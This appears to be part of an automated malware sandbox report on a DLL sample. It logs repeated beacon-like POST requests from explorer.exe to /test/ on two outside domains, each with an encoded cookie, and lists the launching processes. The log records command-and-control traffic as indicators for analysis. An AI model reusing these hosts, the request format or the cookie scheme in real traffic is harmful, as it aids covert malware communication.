                                                                  2024-12-02 17:46:28 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:28 UTC | 799 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bwhvg7VQUc6B2k4OuuGWxlP7jls%2Fk2XcXyU%2BJFvZGhNWGObrkN1RH6Tl%2BicsXeA316oJSX22PU4Ecd8pbchBP79j%2B1ES%2BFL%2BA8BnM%2BrzaQ4uVkEEv5RrVBPy0yJvaLCwhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22f79f3ea217-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13731&min_rtt=13721&rtt_var=5165&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=211563&cwnd=32&unsent_bytes=0&cid=22e29e94a3e149b1&ts=687&x=0"
                                                                  2024-12-02 17:46:28 UTC | 335 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  39 | 192.168.2.5 | 50027 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:30 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:31 UTC | 793 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyeeaOlocEFkIkmn86ClgSWWFJ%2FQ8tq6e6Ulaeg7ZHnzUFxTpOefl%2Fqp9N3QYKA9HNgvqUnWmz2T1wuugn%2FYaElhSYCbyox4ZUY2dD2%2BtpcfihlZlPNYOtwhomNaWgbUyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23056a6d7114-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14045&min_rtt=14030&rtt_var=5291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=206360&cwnd=32&unsent_bytes=0&cid=7949f5a9a33db474&ts=716&x=0"
                                                                  2024-12-02 17:46:31 UTC | 339 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  40 | 192.168.2.5 | 50029 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:33 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:35 UTC | 790 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6T7cV66UKhIP2A%2B%2BbCh6ZjJDIAIiJj99OPEdaDMTYrfMPneEg37XX4RX7twrBmr%2BpiWJ7GRFTGyLWegjIuEbEjcfmpNwnFr%2Fc2Elu383Rg%2BNB2swj%2BkBrX4U8J2XRvP"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd231a0fe8ac52-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14114&min_rtt=14113&rtt_var=5296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=206696&cwnd=32&unsent_bytes=0&cid=9e41d15889808328&ts=1606&x=0"
                                                                  2024-12-02 17:46:35 UTC | 343 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  41 | 192.168.2.5 | 50030 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:36 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:38 UTC | 783 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3KYhObr9uFrh3c2sxCBf2Gt5KdGG%2BALxtlIc0jcGjkx41TTUMhZ22XU13KEcYNnJUaYipWum4VYFyHA0stakA%2Bn0ajvURsNrFb%2BjoQ1rtFoADzHk9wdrknOgsbVKEiz"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd232c3848efa7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1805&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1605277&cwnd=137&unsent_bytes=0&cid=205daadc4796b238&ts=1640&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  42 | 192.168.2.5 | 50031 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:39 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:41 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWsv%2FLWXirzNUI3XbAGT7%2F7z6lRNVI0ozPHww0Euk6Ah2WLpWH3t9Buw%2BBFKgoJRDVZYQBRPGJvopTCgl9TfA%2By%2B%2B8eVqL43oXKdEToOK2Fkqp8XWwCutAVIm8FT9c20"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd233f4ee90cb8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1547&rtt_var=581&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1881443&cwnd=162&unsent_bytes=0&cid=7badd79a26a36872&ts=1660&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  43 | 192.168.2.5 | 50032 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:42 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:44 UTC | 799 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkeejO%2FlYRiM1ZYZoo%2FVhtVj5i3z2hIN515H%2BYPbInWXJzh08B%2BMnIYgcsN%2B7W2kd9oBPqu18ZPeoANhOsBkS%2BZOL%2FFz4qqLmzsivWoJ9oKod57adti%2BFi2h%2F%2ByowM%2Bq"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2351fd8c5e67-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1706&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1676234&cwnd=242&unsent_bytes=0&cid=693ae9fa1a78aedf&ts=1611&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  44 | 192.168.2.5 | 50033 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:45 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:47 UTC | 779 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSiYWGiFWhMOV6M3eMbVa0pmJV8xEODq5tgFZoliNhhDnvdENMjH6oBJEI3EwZ2I3FK1tqDLXRyQvqwLs2MQ2dEfk1jNK6tqIniSXl1enP9y3i3j6rKarATyY6UpXl%2FS"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23646ec7c443-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1539&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=1897335&cwnd=241&unsent_bytes=0&cid=9a78b244faaeb510&ts=1622&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  45 | 192.168.2.5 | 50034 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:48 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:50 UTC | 781 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=heyWE44VIX7FXhSSLnaw013XgzPiOVY7GFF2cIFfImTSF1roGcqvbDzbmMPfrBVVuEB7BVe20M%2FgJQ6Ve3F6hna744aM7RE8m1SivvrqUCrUmMJpbxT7S0%2FevLCPJajL"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd237679c77c9f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1851&min_rtt=1835&rtt_var=700&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1591280&cwnd=213&unsent_bytes=0&cid=6392fa63b2e1eabc&ts=1586&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  46 | 192.168.2.5 | 50035 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:51 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:53 UTC | 790 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdJb9sdgogknPXgn9RFARrhW9ZsLvJyrteszeZ04yogeVyBsll8eTU6L3Dh%2FqyS4YVwJFiNU%2BjopnvEEygpqxE%2BU%2BbMe%2Bdjj3nCNIi%2BjvcbPydtAZXaVZR21jFpvNNxF"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23898a5baad4-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14428&min_rtt=14425&rtt_var=5417&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=202006&cwnd=32&unsent_bytes=0&cid=39ec9e2138476c09&ts=1747&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  47 | 192.168.2.5 | 50036 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:54 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:56 UTC | 786 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WnGEuaNLvNh5b2m4PiNYC84Rl0sGdyZsKkvVZsMehhIYHDF%2Fxlc%2FMQ%2FiQ8Eu8DtlQqgIS8deKQkerk2hM3TUx8jIlt3m5KcfMG4jz4gHpRrRY50%2BdJUJFhG5jCzUSFiJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd239c3dddac8a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13861&min_rtt=13755&rtt_var=5370&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=199931&cwnd=32&unsent_bytes=0&cid=8a9cb9049ad6492a&ts=1594&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  48 | 192.168.2.5 | 50037 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:57 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:59 UTC | 788 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50wPhqxmKR9qvV6qgiUFTe8VwOy75lY0bENk2a2LlUNEllUlSX0Cim%2Be6LA3pubwA9Yye1%2F4u16Qd1EDjP3%2BHn8rge5D%2B1hQ4pukEv%2BcYtkUSBmtLELXPf0zCDnuk6Qg"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23b07d09abd9-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14899&min_rtt=14122&rtt_var=6851&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=143531&cwnd=32&unsent_bytes=0&cid=dd16ef24bb485cfc&ts=1417&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  49 | 192.168.2.5 | 50038 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:47:00 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:47:02 UTC | 786 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:47:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzKUMyXJGscvwpDkuX%2FZkqjsoIgkEnODoSmjXnjHxkiim2JKjP3X6XZi6i2ARv%2FvLJPnk5BIMyU7fAdRQ1Lows3lHSQAf5dCPSWwJ%2FNJbvafE8IVOLdFg1Apsxfh%2FVk6"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23c2a853ab2d-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14244&min_rtt=14239&rtt_var=5351&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=204395&cwnd=32&unsent_bytes=0&cid=ab2bd386aad0dc16&ts=1627&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  50 | 192.168.2.5 | 50039 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:47:03 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:47:05 UTC | 788 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:47:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhCiFSm5MOMwGXy2LMVUdlwbLcgsapsklv%2Farxfx0oh5b8%2BOB19G63Ja4tZpHk%2BM335%2Blk2iUhBlkBhJdCZkfLGUvrarIS8JiI61IJ2EZjKifM1dhNvHLTfm0C7%2FUDoN"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23d5dc374bcc-BUF
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12503&min_rtt=12494&rtt_var=4704&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=232262&cwnd=32&unsent_bytes=0&cid=b24ba16fe51b473d&ts=1736&x=0"


                                                                  Target ID:0
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
                                                                  Imagebase:0x7ff722a90000
                                                                  File size:165'888 bytes
                                                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

